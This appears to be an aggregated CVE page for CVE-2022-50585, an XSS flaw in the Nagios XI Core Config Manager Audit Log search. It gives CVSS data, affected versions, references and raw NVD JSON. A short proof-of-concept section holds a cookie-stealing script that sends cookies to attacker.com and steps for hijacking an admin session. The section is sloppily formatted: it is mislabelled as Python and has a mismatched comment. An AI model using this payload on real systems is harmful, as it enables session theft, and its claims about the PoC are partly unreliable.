CVE-2022-50585

Description

The Core Config Manager (CCM) in Nagios XI versions prior to CCM 3.1.7 / Nagios XI 5.8.9 contains a cross-site scripting (XSS) vulnerability via the Audit Log page search input. Insufficient validation or escaping of user-supplied input may allow an attacker to inject and execute arbitrary script in the context of a victim's browser.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE

Nagios XI < 5.8.9

CCM (Core Config Manager) < 3.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2022-50585 XSS PoC - Nagios XI CCM Audit Log Search -->
<!-- This PoC demonstrates the XSS vulnerability in Nagios XI CCM -->

<!-- Step 1: Inject XSS payload into the Audit Log search input -->
<!-- Payload: <script>alert('XSS')</script> or more sophisticated -->

<!-- Basic XSS PoC payload -->
<script>alert(document.domain)</script>

<!-- Cookie stealing payload (for educational purposes) -->
<script>new Image().src='http://attacker.com/steal?c='+document.cookie</script>

<!-- Simulated attack scenario -->
<!-- 
1. Attacker logs into Nagios XI with low-privilege account
2. Navigate to: CCM -> Tools -> Audit Log
3. In the search box, enter the XSS payload
4. Submit the search (payload gets stored)
5. When admin views the Audit Log, XSS executes
6. Attacker can steal session cookies or perform actions as admin
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50585
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50585
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50585/
[4] VulDB https://vuldb.com/cve/CVE-2022-50585
[5] https://www.nagios.com/changelog/nagios-xi/
[6] https://www.vulncheck.com/advisories/nagios-xi-ccm-xss-via-audit-log-page-search-input

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50585", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:41.933", "lastModified": "2025-11-06T18:19:25.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Core Config Manager (CCM) in Nagios XI versions prior to CCM 3.1.7 / Nagios XI 5.8.9 contains a cross-site scripting (XSS) vulnerability via the Audit Log page search input. Insufficient validation or escaping of user-supplied input may allow an attacker to inject and execute arbitrary script in the context of a victim's browser."}, {"lang": "es", "value": "El Core Config Manager (CCM) en Nagios XI Versiones anteriores a CCM 3.1.7 / Nagios XI 5.8.9 contiene una vulnerabilidad de cross-site scripting (XSS) a través de la entrada de búsqueda de la página de Registro de Auditoría. La validación o el escape insuficiente de la entrada proporcionada por el usuario puede permitir a un atacante inyectar y ejecutar scripts arbitrarios en el contexto del navegador de una víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.8.9", "matchCriteriaId": "1D7B9DD8-0548-4D52-99C3-1925556E8AC2"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-ccm-xss-via-audit-log-page-search-input", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}